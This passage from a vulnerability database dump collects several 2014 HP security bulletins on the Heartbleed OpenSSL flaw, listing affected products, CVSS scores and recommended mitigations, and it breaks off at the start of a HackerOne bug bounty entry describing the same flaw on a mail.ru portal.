document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnUpACgs06y+OxukBiWTHsJUzFVtUs8\r\naeYAn2YETGkjLUrH6Js44b/Lgl4J2nry\r\n=3CzH\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30477", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30477", "title": "[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260637\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260637\r\nVersion: 1\r\n\r\nHPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreEver ESL\r\nG3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL.\r\nThis is the OpenSSL vulnerability known as "Heartbleed" which could be\r\nexploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101513\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version1.0.1f for\r\nthe following firmware versions:\r\n\r\n671H_GS00601\r\n665H_GS12501\r\n663H_GS04601\r\n\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in\r\n655H firmware versions:\r\n\r\n655H_GS10201\r\n\r\nHP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nfirmware versions of HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives. This bulletin will be revised when the software updates\r\nare released.\r\n\r\nHP recommends the following mitigation or workaround that can reduce the\r\nlikelihood of an attacker being able to exploit the "Heartbleed"\r\nvulnerability for the HP StoreEver ESL G3 Tape Library and the StoreEver\r\nEnterprise Library LTO-6 Tape Drives:\r\n\r\nThe following configuration options that allow access to the Heartbeat\r\nfunction in the vulnerable versions of OpenSSL are not enabled by default.\r\nVerify that the following options are "disabled" using the Tape Library GUI:\r\n\r\nSecure SMI-S\r\nCVTL User\r\n\r\nNote: disabling these features blocks the vulnerable OpenSSL function in both\r\nthe ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape\r\nDrives. The basic functionality of the library is not affected by these\r\nconfiguration changes and SSL access to the user interface is not blocked by\r\nthese settings.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW3r0ACgkQ4B86/C0qfVldywCgwtbUfxEMhVuvS81AIP12vW0H\r\nw18AoKFRVIVVjcYhdl94betQ8xPal2sU\r\n=MhNP\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30507", "title": "[security bulletin] HPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 1\r\n\r\nHPSBMU03020 rev.1 - HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-24\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM). This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software updates are available, HP recommends the following\r\nmitigations and workarounds:\r\n\r\nDisable the VCA service name "HP Version Control Agent" on any vulnerable\r\nWindows or Linux server. Disable the VCRM service name "HP Version Control\r\nRepository Manager" on any vulnerable server. Typically, the VCRM is\r\ninstalled on a HP Systems Insight Manager server, but may be installed on\r\nanother server.\r\nIf bulk software or firmware updates are required, use an unaffected or\r\npatched version of HP Smart Update Manager (HP SUM) to do single or batch\r\nupdates.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNZRKMACgkQ4B86/C0qfVnRjACcDCv9Sl93QAssH48SvbycVxCr\r\nfdUAn20/zGmeeTJR2L3N6qzFVQ0PXNAh\r\n=JCF2\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30502", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30502", "title": "[security bulletin] HPSBMU03020 rev.1 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101529)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 (including all patches) HP Cloud System Chargeback 9.40\r\n(including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWbHwACgkQ4B86/C0qfVl2AgCg+g9OYkOXmavhzO8oNrQAqZEC\r\ngnkAoJ7e9mgEcg6wSdzVzykAsNISIB7E\r\n=v1pz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508", "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239375\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239375\r\nVersion: 1\r\n\r\nHPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Smart Update\r\nManager (SUM) running OpenSSL.This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101503\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Smart Update Manager (SUM). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nUntil the software updates are available, HP recommends limiting HP SUM usage\r\nto a secure and isolated private management network.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnCEgCgs9NE3ajD5WkXefc30WZhR/JQ\r\ngwkAoNoHbkxpxzqSry1ZLk2OkJIc3Tnk\r\n=jhjw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30476", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30476", "title": "[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "bulletinFamily": "bugbounty", "bounty": 200.0, "cvelist": [], "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, 